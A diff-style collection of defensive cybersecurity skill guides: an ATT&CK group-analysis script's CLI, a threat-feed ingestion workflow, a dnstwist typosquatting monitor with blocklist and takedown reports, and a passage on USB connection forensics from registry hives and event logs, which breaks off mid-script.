||||
description="MITRE ATT&CK Threat Actor TTP Analyzer"
|
||||
)
|
||||
parser.add_argument("--group", help="Threat group name (e.g., APT29)")
|
||||
parser.add_argument("--compare", nargs="+", help="Compare multiple groups")
|
||||
parser.add_argument(
|
||||
"--gap-analysis", action="store_true", help="Perform detection gap analysis"
|
||||
)
|
||||
parser.add_argument(
|
||||
"--detections",
|
||||
help="JSON file with detected technique IDs",
|
||||
)
|
||||
parser.add_argument("--breakdown", action="store_true", help="Tactic breakdown")
|
||||
parser.add_argument("--output", default="attack_layer.json", help="Output file")
|
||||
|
||||
args = parser.parse_args()
|
||||
analyzer = ATTACKAnalyzer()
|
||||
|
||||
if args.compare:
|
||||
comparison = analyzer.compare_groups(args.compare)
|
||||
print(json.dumps(comparison, indent=2))
|
||||
with open(args.output, "w") as f:
|
||||
json.dump(comparison, f, indent=2)
|
||||
|
||||
elif args.group and args.gap_analysis:
|
||||
detected = set()
|
||||
if args.detections:
|
||||
with open(args.detections) as f:
|
||||
detected = set(json.load(f))
|
||||
|
||||
analysis = analyzer.gap_analysis(args.group, detected)
|
||||
print(json.dumps(analysis, indent=2))
|
||||
with open(args.output, "w") as f:
|
||||
json.dump(analysis, f, indent=2)
|
||||
|
||||
elif args.group and args.breakdown:
|
||||
breakdown = analyzer.tactic_breakdown(args.group)
|
||||
print(json.dumps(breakdown, indent=2))
|
||||
|
||||
elif args.group:
|
||||
tech_map = analyzer.get_group_techniques(args.group)
|
||||
layer = analyzer.create_navigator_layer(args.group, tech_map)
|
||||
with open(args.output, "w") as f:
|
||||
json.dump(layer, f, indent=2)
|
||||
print(f"[+] Navigator layer saved to {args.output}")
|
||||
|
||||
else:
|
||||
parser.print_help()
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
@@ -0,0 +1,104 @@
|
||||
---
|
||||
name: analyzing-threat-intelligence-feeds
|
||||
description: >
|
||||
Analyzes structured and unstructured threat intelligence feeds to extract actionable indicators,
|
||||
adversary tactics, and campaign context. Use when ingesting commercial or open-source CTI feeds,
|
||||
evaluating feed quality, normalizing data into STIX 2.1 format, or enriching existing IOCs with
|
||||
campaign attribution. Activates for requests involving ThreatConnect, Recorded Future, Mandiant
|
||||
Advantage, MISP, AlienVault OTX, or automated feed aggregation pipelines.
|
||||
domain: cybersecurity
|
||||
subdomain: threat-intelligence
|
||||
tags: [STIX, TAXII, MITRE-ATT&CK, IOC, ThreatConnect, Recorded-Future, MISP, CTI, NIST-CSF]
|
||||
version: 1.0.0
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
# Analyzing Threat Intelligence Feeds
|
||||
|
||||
## When to Use
|
||||
|
||||
Use this skill when:
|
||||
- Ingesting new commercial or OSINT threat feeds and assessing their signal-to-noise ratio
|
||||
- Normalizing heterogeneous IOC formats (STIX 2.1, OpenIOC, YARA, Sigma) into a unified schema
|
||||
- Evaluating feed freshness, fidelity, and relevance to the organization's threat profile
|
||||
- Building automated enrichment pipelines that correlate IOCs against SIEM events
|
||||
|
||||
**Do not use** this skill for raw packet capture analysis or live incident triage without first establishing a CTI baseline.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Access to a Threat Intelligence Platform (TIP) such as ThreatConnect, MISP, or OpenCTI
|
||||
- API keys for at least one commercial feed (Recorded Future, Mandiant Advantage, or VirusTotal Enterprise)
|
||||
- TAXII 2.1 client library (taxii2-client Python package or equivalent)
|
||||
- Role with read/write permissions to the TIP's indicator database
|
||||
|
||||
## Workflow
|
||||
|
||||
### Step 1: Enumerate and Prioritize Feed Sources
|
||||
|
||||
List all available feeds categorized by type (commercial, government, ISAC, OSINT):
|
||||
- Commercial: Recorded Future, Mandiant Advantage, CrowdStrike Falcon Intelligence
|
||||
- Government: CISA AIS (Automated Indicator Sharing), FBI InfraGard, MS-ISAC
|
||||
- OSINT: AlienVault OTX, Abuse.ch, PhishTank, Emerging Threats
|
||||
|
||||
Score each feed on: update frequency, historical accuracy rate, coverage of your sector, and attribution depth. Use a weighted scoring matrix with criteria from NIST SP 800-150 (Guide to Cyber Threat Information Sharing).
|
||||
|
||||
### Step 2: Ingest via TAXII 2.1 or API
|
||||
|
||||
For TAXII-enabled feeds:
|
||||
```
|
||||
taxii2-client discover https://feed.example.com/taxii/
|
||||
taxii2-client get-collection --collection-id <id> --since 2024-01-01
|
||||
```
|
||||
|
||||
For REST API feeds (e.g., Recorded Future):
|
||||
- Query `/v2/indicator/search` with `risk_score_min=65` to filter low-confidence IOCs
|
||||
- Apply rate limiting and exponential backoff for API resilience
|
||||
|
||||
### Step 3: Normalize to STIX 2.1
|
||||
|
||||
Convert each IOC to STIX 2.1 objects using the OASIS standard schema:
|
||||
- IP address → `indicator` object with `pattern: "[ipv4-addr:value = '...']"`
|
||||
- Domain → `indicator` with `pattern: "[domain-name:value = '...']"`
|
||||
- File hash → `indicator` with `pattern: "[file:hashes.SHA-256 = '...']"`
|
||||
|
||||
Attach `relationship` objects linking indicators to `threat-actor` or `malware` objects. Use `confidence` field (0–100) based on source fidelity rating.
|
||||
|
||||
### Step 4: Deduplicate and Enrich
|
||||
|
||||
Run deduplication against existing TIP database using normalized value + type as composite key. Enrich surviving IOCs:
|
||||
- VirusTotal: detection ratio, sandbox behavior reports
|
||||
- PassiveTotal (RiskIQ): WHOIS history, passive DNS, SSL certificate chains
|
||||
- Shodan: banner data, open ports, geographic location
|
||||
|
||||
### Step 5: Distribute to Consuming Systems
|
||||
|
||||
Export enriched indicators via TAXII 2.1 push to SIEM (Splunk, Microsoft Sentinel), firewalls (Palo Alto XSOAR playbooks), and EDR platforms. Set TTL (time-to-live) per indicator type: IP addresses 30 days, domains 90 days, file hashes 1 year.
|
||||
|
||||
## Key Concepts
|
||||
|
||||
| Term | Definition |
|
||||
|------|-----------|
|
||||
| **STIX 2.1** | Structured Threat Information Expression — OASIS standard JSON schema for CTI objects including indicators, threat actors, campaigns, and relationships |
|
||||
| **TAXII 2.1** | Trusted Automated eXchange of Intelligence Information — HTTPS-based protocol for sharing STIX content between servers and clients |
|
||||
| **IOC** | Indicator of Compromise — observable artifact (IP, domain, hash, URL) that indicates a system may have been breached |
|
||||
| **TLP** | Traffic Light Protocol — color-coded classification (RED/AMBER/GREEN/WHITE) defining sharing restrictions for CTI |
|
||||
| **Confidence Score** | Numeric value (0–100 in STIX) reflecting the producer's certainty about an indicator's malicious attribution |
|
||||
| **Feed Fidelity** | Historical accuracy rate of a feed measured by true positive rate in production detections |
|
||||
|
||||
## Tools & Systems
|
||||
|
||||
- **ThreatConnect TC Exchange**: Aggregates 100+ commercial and OSINT feeds; provides automated playbooks for IOC enrichment
|
||||
- **MISP (Malware Information Sharing Platform)**: Open-source TIP supporting STIX/TAXII; widely used by ISACs and government CERTs
|
||||
- **OpenCTI**: Open-source platform with native MITRE ATT&CK integration and graph-based relationship visualization
|
||||
- **Recorded Future**: Commercial feed with AI-powered risk scoring and real-time dark web monitoring
|
||||
- **taxii2-client**: Python library for TAXII 2.0/2.1 client operations (pip install taxii2-client)
|
||||
- **PyMISP**: Python API for MISP feed management and IOC submission
|
||||
|
||||
## Common Pitfalls
|
||||
|
||||
- **IOC age staleness**: IP addresses and domains rotate frequently; applying 1-year-old IOCs generates false positives. Enforce TTL policies.
|
||||
- **Missing context**: Blocking an IOC without understanding the associated campaign or adversary can disrupt legitimate business traffic (e.g., CDN IPs shared with malicious actors).
|
||||
- **Feed overlap without deduplication**: Ingesting the same IOC from five feeds without deduplication inflates indicator counts and SIEM rule complexity.
|
||||
- **TLP violation**: Redistributing RED-classified intelligence outside authorized boundaries violates sharing agreements and trust relationships.
|
||||
- **Over-blocking on low-confidence indicators**: Indicators with confidence below 50 should trigger detection-only rules, not blocking, to avoid operational disruption.
|
||||
@@ -0,0 +1,298 @@
|
||||
---
|
||||
name: analyzing-typosquatting-domains-with-dnstwist
|
||||
description: Detect typosquatting, homograph phishing, and brand impersonation domains using dnstwist to generate domain permutations and identify registered lookalike domains targeting your organization.
|
||||
domain: cybersecurity
|
||||
subdomain: threat-intelligence
|
||||
tags: [dnstwist, typosquatting, phishing, domain-monitoring, brand-protection, homograph, dns, threat-intelligence]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
# Analyzing Typosquatting Domains with DNSTwist
|
||||
|
||||
## Overview
|
||||
|
||||
DNSTwist is a domain name permutation engine that generates similar-looking domain names to detect typosquatting, homograph phishing attacks, and brand impersonation. It creates thousands of domain permutations using techniques like character substitution, transposition, insertion, omission, and homoglyph replacement, then checks DNS records (A, AAAA, NS, MX), calculates web page similarity using fuzzy hashing (ssdeep) and perceptual hashing (pHash), and identifies potentially malicious registered domains.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Python 3.9+ with `dnstwist` installed (`pip install dnstwist[full]`)
|
||||
- Optional: GeoIP database for IP geolocation
|
||||
- Optional: Shodan API key for enrichment
|
||||
- Network access to perform DNS queries
|
||||
- Understanding of DNS record types and domain registration
|
||||
|
||||
## Key Concepts
|
||||
|
||||
### Domain Permutation Techniques
|
||||
|
||||
DNSTwist generates permutations using: addition (appending characters), bitsquatting (bit-flip errors), homoglyph (visually similar Unicode characters like rn vs m), hyphenation (adding hyphens), insertion (inserting characters), omission (removing characters), repetition (repeating characters), replacement (replacing with adjacent keyboard keys), subdomain (inserting dots), transposition (swapping adjacent characters), vowel-swap (swapping vowels), and dictionary-based (appending common words).
|
||||
|
||||
### Fuzzy Hashing and Visual Similarity
|
||||
|
||||
DNSTwist uses ssdeep (locality-sensitive hash) to compare HTML content and pHash (perceptual hash) to compare screenshots of web pages. This helps identify cloned phishing sites that visually mimic the legitimate site. A high similarity score indicates a likely phishing page.
|
||||
|
||||
### Detection Workflow
|
||||
|
||||
The typical workflow is: generate domain permutations -> resolve DNS records -> check for registered domains -> compare web page similarity -> flag suspicious domains -> alert security team -> request takedown. For a typical corporate domain, dnstwist generates 5,000-10,000 permutations.
|
||||
|
||||
## Practical Steps
|
||||
|
||||
### Step 1: Basic Domain Permutation Scan
|
||||
|
||||
```python
|
||||
import subprocess
|
||||
import json
|
||||
import csv
|
||||
from datetime import datetime
|
||||
|
||||
def run_dnstwist_scan(domain, output_file=None):
|
||||
"""Run dnstwist scan against a target domain."""
|
||||
cmd = [
|
||||
"dnstwist",
|
||||
"--registered", # Only show registered domains
|
||||
"--format", "json", # Output in JSON
|
||||
"--nameservers", "8.8.8.8,1.1.1.1",
|
||||
"--threads", "50",
|
||||
"--mxcheck", # Check MX records
|
||||
"--ssdeep", # Fuzzy hash comparison
|
||||
"--geoip", # GeoIP lookup
|
||||
domain,
|
||||
]
|
||||
|
||||
print(f"[*] Scanning permutations for: {domain}")
|
||||
result = subprocess.run(cmd, capture_output=True, text=True, timeout=600)
|
||||
|
||||
if result.returncode == 0:
|
||||
results = json.loads(result.stdout)
|
||||
registered = [r for r in results if r.get("dns_a") or r.get("dns_aaaa")]
|
||||
print(f"[+] Found {len(registered)} registered lookalike domains")
|
||||
|
||||
if output_file:
|
||||
with open(output_file, "w") as f:
|
||||
json.dump(registered, f, indent=2)
|
||||
print(f"[+] Results saved to {output_file}")
|
||||
|
||||
return registered
|
||||
else:
|
||||
print(f"[-] dnstwist error: {result.stderr}")
|
||||
return []
|
||||
|
||||
results = run_dnstwist_scan("example.com", "typosquat_results.json")
|
||||
```
|
||||
|
||||
### Step 2: Analyze and Prioritize Results
|
||||
|
||||
```python
|
||||
def analyze_results(results, legitimate_ips=None):
|
||||
"""Analyze dnstwist results and prioritize threats."""
|
||||
legitimate_ips = legitimate_ips or set()
|
||||
high_risk = []
|
||||
medium_risk = []
|
||||
low_risk = []
|
||||
|
||||
for entry in results:
|
||||
domain = entry.get("domain", "")
|
||||
fuzzer = entry.get("fuzzer", "")
|
||||
dns_a = entry.get("dns_a", [])
|
||||
dns_mx = entry.get("dns_mx", [])
|
||||
ssdeep_score = entry.get("ssdeep_score", 0)
|
||||
|
||||
risk_score = 0
|
||||
risk_factors = []
|
||||
|
||||
# High similarity to legitimate site
|
||||
if ssdeep_score and ssdeep_score > 50:
|
||||
risk_score += 40
|
||||
risk_factors.append(f"high web similarity ({ssdeep_score}%)")
|
||||
|
||||
# Has MX records (can receive email / phishing)
|
||||
if dns_mx:
|
||||
risk_score += 20
|
||||
risk_factors.append("has MX records (email capable)")
|
||||
|
||||
# Recently registered (if whois data available)
|
||||
whois_created = entry.get("whois_created", "")
|
||||
if whois_created:
|
||||
try:
|
||||
created = datetime.fromisoformat(whois_created.replace("Z", "+00:00"))
|
||||
age_days = (datetime.now(created.tzinfo) - created).days
|
||||
if age_days < 30:
|
||||
risk_score += 30
|
||||
risk_factors.append(f"recently registered ({age_days} days)")
|
||||
elif age_days < 90:
|
||||
risk_score += 15
|
||||
risk_factors.append(f"registered {age_days} days ago")
|
||||
except (ValueError, TypeError):
|
||||
pass
|
||||
|
||||
# Homoglyph attacks are highest risk
|
||||
if fuzzer == "homoglyph":
|
||||
risk_score += 25
|
||||
risk_factors.append("homoglyph (visually identical)")
|
||||
elif fuzzer in ("addition", "replacement", "transposition"):
|
||||
risk_score += 10
|
||||
risk_factors.append(f"permutation type: {fuzzer}")
|
||||
|
||||
# Not pointing to legitimate infrastructure
|
||||
if dns_a and not set(dns_a).intersection(legitimate_ips):
|
||||
risk_score += 10
|
||||
risk_factors.append("different IP from legitimate")
|
||||
|
||||
entry["risk_score"] = risk_score
|
||||
entry["risk_factors"] = risk_factors
|
||||
|
||||
if risk_score >= 50:
|
||||
high_risk.append(entry)
|
||||
elif risk_score >= 25:
|
||||
medium_risk.append(entry)
|
||||
else:
|
||||
low_risk.append(entry)
|
||||
|
||||
high_risk.sort(key=lambda x: x["risk_score"], reverse=True)
|
||||
medium_risk.sort(key=lambda x: x["risk_score"], reverse=True)
|
||||
|
||||
print(f"\n=== Typosquatting Analysis ===")
|
||||
print(f"High Risk: {len(high_risk)}")
|
||||
print(f"Medium Risk: {len(medium_risk)}")
|
||||
print(f"Low Risk: {len(low_risk)}")
|
||||
|
||||
if high_risk:
|
||||
print(f"\n--- High Risk Domains ---")
|
||||
for entry in high_risk[:10]:
|
||||
print(f" {entry['domain']} (score: {entry['risk_score']})")
|
||||
for factor in entry['risk_factors']:
|
||||
print(f" - {factor}")
|
||||
|
||||
return {"high": high_risk, "medium": medium_risk, "low": low_risk}
|
||||
|
||||
analysis = analyze_results(results, legitimate_ips={"93.184.216.34"})
|
||||
```
|
||||
|
||||
### Step 3: Continuous Monitoring Pipeline
|
||||
|
||||
```python
|
||||
import time
|
||||
import hashlib
|
||||
|
||||
class TyposquatMonitor:
|
||||
def __init__(self, domains, known_domains_file="known_typosquats.json"):
|
||||
self.domains = domains
|
||||
self.known_file = known_domains_file
|
||||
self.known_domains = self._load_known()
|
||||
|
||||
def _load_known(self):
|
||||
try:
|
||||
with open(self.known_file, "r") as f:
|
||||
return json.load(f)
|
||||
except FileNotFoundError:
|
||||
return {}
|
||||
|
||||
def _save_known(self):
|
||||
with open(self.known_file, "w") as f:
|
||||
json.dump(self.known_domains, f, indent=2)
|
||||
|
||||
def scan_all_domains(self):
|
||||
"""Scan all monitored domains for new typosquats."""
|
||||
new_findings = []
|
||||
for domain in self.domains:
|
||||
results = run_dnstwist_scan(domain)
|
||||
for entry in results:
|
||||
domain_key = entry.get("domain", "")
|
||||
if domain_key not in self.known_domains:
|
||||
entry["first_seen"] = datetime.now().isoformat()
|
||||
entry["monitored_domain"] = domain
|
||||
self.known_domains[domain_key] = entry
|
||||
new_findings.append(entry)
|
||||
print(f" [NEW] {domain_key} ({entry.get('fuzzer', '')})")
|
||||
|
||||
self._save_known()
|
||||
print(f"\n[+] New typosquatting domains found: {len(new_findings)}")
|
||||
return new_findings
|
||||
|
||||
def generate_alert(self, findings):
|
||||
"""Generate alert for new high-risk typosquatting domains."""
|
||||
analysis = analyze_results(findings)
|
||||
alerts = []
|
||||
for entry in analysis["high"]:
|
||||
alerts.append({
|
||||
"severity": "HIGH",
|
||||
"domain": entry["domain"],
|
||||
"target": entry.get("monitored_domain", ""),
|
||||
"risk_score": entry["risk_score"],
|
||||
"risk_factors": entry["risk_factors"],
|
||||
"dns_a": entry.get("dns_a", []),
|
||||
"dns_mx": entry.get("dns_mx", []),
|
||||
"timestamp": datetime.now().isoformat(),
|
||||
})
|
||||
return alerts
|
||||
|
||||
monitor = TyposquatMonitor(["mycompany.com", "mycompany.org"])
|
||||
new_findings = monitor.scan_all_domains()
|
||||
alerts = monitor.generate_alert(new_findings)
|
||||
```
|
||||
|
||||
### Step 4: Export for Blocklist and Takedown
|
||||
|
||||
```python
|
||||
def export_blocklist(analysis, output_file="blocklist.txt"):
|
||||
"""Export high-risk domains as blocklist for firewall/proxy."""
|
||||
domains = []
|
||||
for entry in analysis["high"] + analysis["medium"]:
|
||||
domain = entry.get("domain", "")
|
||||
if domain:
|
||||
domains.append(domain)
|
||||
|
||||
with open(output_file, "w") as f:
|
||||
f.write(f"# Typosquatting blocklist generated {datetime.now().isoformat()}\n")
|
||||
for d in sorted(set(domains)):
|
||||
f.write(f"{d}\n")
|
||||
|
||||
print(f"[+] Blocklist saved: {len(domains)} domains -> {output_file}")
|
||||
return domains
|
||||
|
||||
def generate_takedown_report(high_risk_domains):
|
||||
"""Generate takedown request report."""
|
||||
report = f"""# Domain Takedown Request
|
||||
Generated: {datetime.now().isoformat()}
|
||||
|
||||
## Summary
|
||||
{len(high_risk_domains)} domains identified as potential typosquatting/phishing.
|
||||
|
||||
## Domains Requiring Takedown
|
||||
"""
|
||||
for entry in high_risk_domains:
|
||||
report += f"""
|
||||
### {entry['domain']}
|
||||
- **Permutation Type**: {entry.get('fuzzer', 'unknown')}
|
||||
- **IP Address**: {', '.join(entry.get('dns_a', ['N/A']))}
|
||||
- **MX Records**: {', '.join(entry.get('dns_mx', ['N/A']))}
|
||||
- **Risk Score**: {entry.get('risk_score', 0)}
|
||||
- **Risk Factors**: {'; '.join(entry.get('risk_factors', []))}
|
||||
- **Web Similarity**: {entry.get('ssdeep_score', 'N/A')}%
|
||||
"""
|
||||
with open("takedown_report.md", "w") as f:
|
||||
f.write(report)
|
||||
print("[+] Takedown report generated: takedown_report.md")
|
||||
|
||||
export_blocklist(analysis)
|
||||
generate_takedown_report(analysis["high"])
|
||||
```
|
||||
|
||||
## Validation Criteria
|
||||
|
||||
- DNSTwist generates domain permutations for target domain
|
||||
- DNS resolution identifies registered lookalike domains
|
||||
- Web similarity scoring detects cloned phishing pages
|
||||
- Risk scoring prioritizes domains by threat level
|
||||
- Continuous monitoring detects newly registered typosquats
|
||||
- Blocklist and takedown reports generated correctly
|
||||
|
||||
## References
|
||||
|
||||
- [dnstwist GitHub Repository](https://github.com/elceef/dnstwist)
|
||||
- [dnstwister Online Service](https://dnstwister.report/)
|
||||
- [HawkEye: Detect Typosquatting with DNSTwist](https://hawk-eye.io/2022/11/how-to-detect-typosquatting-using-dnstwist/)
|
||||
- [Darktrace: Monitoring Typosquatting Domains](https://www.darktrace.com/blog/vigilance-in-action-monitoring-typosquatting-domains)
|
||||
- [Security Risk Advisors: Domain Monitoring](https://sra.io/blog/domain-monitoring-fast-and-cheap/)
|
||||
- [Conscia: How to Detect Typosquatting](https://conscia.com/blog/diving-deep-how-to-detect-typosquatting/)
|
||||
@@ -0,0 +1,352 @@
|
||||
---
|
||||
name: analyzing-usb-device-connection-history
|
||||
description: Investigate USB device connection history from Windows registry, event logs, and setupapi logs to track removable media usage and potential data exfiltration.
|
||||
domain: cybersecurity
|
||||
subdomain: digital-forensics
|
||||
tags: [forensics, usb-forensics, removable-media, registry-analysis, data-exfiltration, device-history]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
|
||||
# Analyzing USB Device Connection History
|
||||
|
||||
## When to Use
|
||||
- When investigating potential data exfiltration via removable storage devices
|
||||
- During insider threat investigations to track USB device usage
|
||||
- For compliance audits verifying removable media policy enforcement
|
||||
- When correlating USB connections with file access and copy events
|
||||
- For establishing a timeline of device connections during an incident
|
||||
|
||||
## Prerequisites
|
||||
- Forensic image or extracted registry hives and event logs
|
||||
- Access to SYSTEM, SOFTWARE, and NTUSER.DAT registry hives
|
||||
- SetupAPI logs (setupapi.dev.log)
|
||||
- Windows Event Logs (System, Security, DriverFrameworks-UserMode)
|
||||
- USBDeview, USB Forensic Tracker, or RegRipper
|
||||
- Understanding of USB device identification (VID, PID, serial number)
|
||||
|
||||
## Workflow
|
||||
|
||||
### Step 1: Extract USB-Related Artifacts
|
||||
|
||||
```bash
|
||||
# Mount forensic image and copy relevant artifacts
|
||||
mount -o ro,loop,offset=$((2048*512)) /cases/case-2024-001/images/evidence.dd /mnt/evidence
|
||||
|
||||
mkdir -p /cases/case-2024-001/usb/
|
||||
|
||||
# Registry hives
|
||||
cp /mnt/evidence/Windows/System32/config/SYSTEM /cases/case-2024-001/usb/
|
||||
cp /mnt/evidence/Windows/System32/config/SOFTWARE /cases/case-2024-001/usb/
|
||||
cp /mnt/evidence/Users/*/NTUSER.DAT /cases/case-2024-001/usb/
|
||||
|
||||
# SetupAPI logs (first connection timestamps)
|
||||
cp /mnt/evidence/Windows/INF/setupapi.dev.log /cases/case-2024-001/usb/
|
||||
|
||||
# Event logs
|
||||
cp /mnt/evidence/Windows/System32/winevt/Logs/System.evtx /cases/case-2024-001/usb/
|
||||
cp "/mnt/evidence/Windows/System32/winevt/Logs/Microsoft-Windows-DriverFrameworks-UserMode%4Operational.evtx" \
|
||||
/cases/case-2024-001/usb/ 2>/dev/null
|
||||
cp "/mnt/evidence/Windows/System32/winevt/Logs/Microsoft-Windows-Partition%4Diagnostic.evtx" \
|
||||
/cases/case-2024-001/usb/ 2>/dev/null
|
||||
```
|
||||
|
||||
### Step 2: Parse USBSTOR Registry Key
|
||||
|
||||
```bash
|
||||
# Extract USBSTOR entries from SYSTEM hive
|
||||
python3 << 'PYEOF'
|
||||
from Registry import Registry
|
||||
import json
|
||||
|
||||
reg = Registry.Registry("/cases/case-2024-001/usb/SYSTEM")
|
||||
|
||||
# Find current ControlSet
|
||||
select = reg.open("Select")
|
||||
current = select.value("Current").value()
|
||||
controlset = f"ControlSet{current:03d}"
|
||||
|
||||
# Parse USBSTOR
|
||||
usbstor_path = f"{controlset}\\Enum\\USBSTOR"
|
||||
usbstor = reg.open(usbstor_path)
|
||||
|
||||
devices = []
|
||||
print("=== USBSTOR DEVICES ===\n")
|
||||
|
||||
for device_class in usbstor.subkeys():
|
||||
# Format: Disk&Ven_VENDOR&Prod_PRODUCT&Rev_REVISION
|
||||
class_name = device_class.name()
|
||||
parts = class_name.split('&')
|
||||
vendor = parts[1].replace('Ven_', '') if len(parts) > 1 else 'Unknown'
|
||||
product = parts[2].replace('Prod_', '') if len(parts) > 2 else 'Unknown'
|
||||
revision = parts[3].replace('Rev_', '') if len(parts) > 3 else 'Unknown'
|
||||
|
||||
for instance in device_class.subkeys():
|
||||
serial = instance.name()
|
||||
last_write = instance.timestamp()
|
||||
|
||||
device_info = {
|
||||
'vendor': vendor,
|
||||
'product': product,
|
||||
'revision': revision,
|
||||
'serial': serial,
|
||||
'last_connected': str(last_write),
|
||||
}
|
||||
|
||||
# Get friendly name if available
|
||||
try:
|
||||
friendly = instance.value("FriendlyName").value()
|
||||
device_info['friendly_name'] = friendly
|
||||
except:
|
||||
pass
|
||||
|
||||
# Get device parameters
|
||||
try:
|
||||
params = instance.subkey("Device Parameters")
|
||||
try:
|
||||
device_info['class_guid'] = params.value("ClassGUID").value()
|
||||
except:
|
||||
pass
|
||||
except:
|
||||
pass
|
||||
|
||||
devices.append(device_info)
|
||||
print(f"Device: {vendor} {product}")
|
||||
print(f" Serial: {serial}")
|
||||
print(f" Last Connected: {last_write}")
|
||||
print(f" Friendly Name: {device_info.get('friendly_name', 'N/A')}")
|
||||
print()
|
||||
|
||||
# Save results
|
||||
with open('/cases/case-2024-001/analysis/usb_devices.json', 'w') as f:
|
||||
json.dump(devices, f, indent=2)
|
||||
|
||||
print(f"\nTotal USB storage devices found: {len(devices)}")
|
||||
PYEOF
|
||||
```
|
||||
|
||||
### Step 3: Extract Drive Letter Assignments and User Associations
|
||||
|
||||
```bash
|
||||
# Parse MountedDevices from SYSTEM hive
|
||||
python3 << 'PYEOF'
|
||||
from Registry import Registry
|
||||
import struct
|
||||
|
||||
reg = Registry.Registry("/cases/case-2024-001/usb/SYSTEM")
|
||||
|
||||
mounted = reg.open("MountedDevices")
|
||||
|
||||
print("=== MOUNTED DEVICES (Drive Letter Assignments) ===\n")
|
||||
for value in mounted.values():
|
||||
name = value.name()
|
||||
data = value.value()
|
||||
|
||||
if name.startswith("\\DosDevices\\"):
|
||||
drive_letter = name.replace("\\DosDevices\\", "")
|
||||
if len(data) > 24:
|
||||
# USB device - contains device path string
|
||||
try:
|
||||
device_path = data.decode('utf-16-le').strip('\x00')
|
||||
if 'USBSTOR' in device_path or 'USB#' in device_path:
|
||||
print(f" {drive_letter} -> {device_path}")
|
||||
except:
|
||||
pass
|
||||
else:
|
||||
# Fixed disk - contains disk signature + offset
|
||||
disk_sig = struct.unpack('<I', data[0:4])[0]
|
||||
offset = struct.unpack('<Q', data[4:12])[0]
|
||||
print(f" {drive_letter} -> Disk Signature: 0x{disk_sig:08X}, Offset: {offset}")
|
||||
PYEOF
|
||||
|
||||
# Parse user MountPoints2 (which user accessed which devices)
|
||||
python3 << 'PYEOF'
|
||||
from Registry import Registry
|
||||
import os, glob
|
||||
|
||||
print("\n=== USER MOUNT POINTS (MountPoints2) ===\n")
|
||||
|
||||
for ntuser in glob.glob("/cases/case-2024-001/usb/NTUSER*.DAT"):
|
||||
try:
|
||||
reg = Registry.Registry(ntuser)
|
||||
mp2 = reg.open("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MountPoints2")
|
||||
|
||||
print(f"User hive: {os.path.basename(ntuser)}")
|
||||
for key in mp2.subkeys():
|
||||
guid = key.name()
|
||||
last_write = key.timestamp()
|
||||
if '{' in guid:
|
||||
print(f" Volume: {guid} | Last accessed: {last_write}")
|
||||
print()
|
||||
except Exception as e:
|
||||
print(f" Error parsing {ntuser}: {e}")
|
||||
PYEOF
|
||||
```
|
||||
|
||||
### Step 4: Extract First Connection Timestamps from SetupAPI
|
||||
|
||||
```bash
|
||||
# Parse setupapi.dev.log for USB device first-install timestamps
|
||||
python3 << 'PYEOF'
|
||||
import re
|
||||
|
||||
print("=== SETUPAPI USB DEVICE INSTALLATIONS ===\n")
|
||||
|
||||
with open('/cases/case-2024-001/usb/setupapi.dev.log', 'r', errors='ignore') as f:
|
||||
content = f.read()
|
||||
|
||||
# Find USB device installation sections
|
||||
pattern = r'>>>\s+\[Device Install.*?\n.*?Section start (\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}).*?\n(.*?)<<<'
|
||||
matches = re.findall(pattern, content, re.DOTALL)
|
||||
|
||||
usb_installs = []
|
||||
for timestamp, section in matches:
|
||||
if 'USBSTOR' in section or 'USB\\VID' in section:
|
||||
# Extract device ID
|
||||
dev_match = re.search(r'(USBSTOR\\[^\s]+|USB\\VID_\w+&PID_\w+[^\s]*)', section)
|
||||
if dev_match:
|
||||
device_id = dev_match.group(1)
|
||||
usb_installs.append({
|
||||
'first_install': timestamp,
|
||||
'device_id': device_id
|
||||
})
|
||||
print(f" {timestamp} | {device_id}")
|
||||
|
||||
print(f"\nTotal USB installations found: {len(usb_installs)}")
|
||||
PYEOF
|
||||
|
||||
# Parse Windows Event Logs for USB events
|
||||
# Event IDs: 2003, 2010, 2100, 2102 (DriverFrameworks-UserMode)
|
||||
# Event IDs: 6416 (Security - new external device recognized)
|
||||
python3 << 'PYEOF'
|
||||
import json
|
||||
from evtx import PyEvtxParser
|
||||
|
||||
try:
|
||||
parser = PyEvtxParser("/cases/case-2024-001/usb/System.evtx")
|
||||
|
||||
print("\n=== SYSTEM EVENT LOG USB EVENTS ===\n")
|
||||
for record in parser.records_json():
|
||||
data = json.loads(record['data'])
|
||||
event_id = str(data['Event']['System']['EventID'])
|
||||
|
||||
# USB device connection events
|
||||
if event_id in ('20001', '20003', '10000', '10100'):
|
||||
timestamp = data['Event']['System']['TimeCreated']['#attributes']['SystemTime']
|
||||
event_data = data['Event'].get('UserData', data['Event'].get('EventData', {}))
|
||||
print(f" [{timestamp}] EventID {event_id}: {json.dumps(event_data, default=str)[:200]}")
|
||||
except Exception as e:
|
||||
print(f"Error: {e}")
|
||||
PYEOF
|
||||
```
|
||||
|
||||
### Step 5: Build USB Activity Timeline and Report
|
||||
|
||||
```bash
|
||||
# Compile all USB evidence into a unified timeline
|
||||
python3 << 'PYEOF'
|
||||
import json, csv
|
||||
|
||||
timeline = []
|
||||
|
||||
# Load USBSTOR data
|
||||
with open('/cases/case-2024-001/analysis/usb_devices.json') as f:
|
||||
devices = json.load(f)
|
||||
|
||||
for device in devices:
|
||||
timeline.append({
|
||||
'timestamp': device['last_connected'],
|
||||
'source': 'USBSTOR Registry',
|
||||
'device': f"{device['vendor']} {device['product']}",
|
||||
'serial': device['serial'],
|
||||
'event': 'Last Connected',
|
||||
'detail': device.get('friendly_name', '')
|
||||
})
|
||||
|
||||
# Sort chronologically
|
||||
timeline.sort(key=lambda x: x['timestamp'])
|
||||
|
||||
# Write timeline CSV
|
||||
with open('/cases/case-2024-001/analysis/usb_timeline.csv', 'w', newline='') as f:
|
||||
writer = csv.DictWriter(f, fieldnames=['timestamp', 'source', 'device', 'serial', 'event', 'detail'])
|
||||
writer.writeheader()
|
||||
writer.writerows(timeline)
|
||||
|
||||
print(f"USB Timeline: {len(timeline)} events written to usb_timeline.csv")
|
||||
|
||||
# Print summary
|
||||
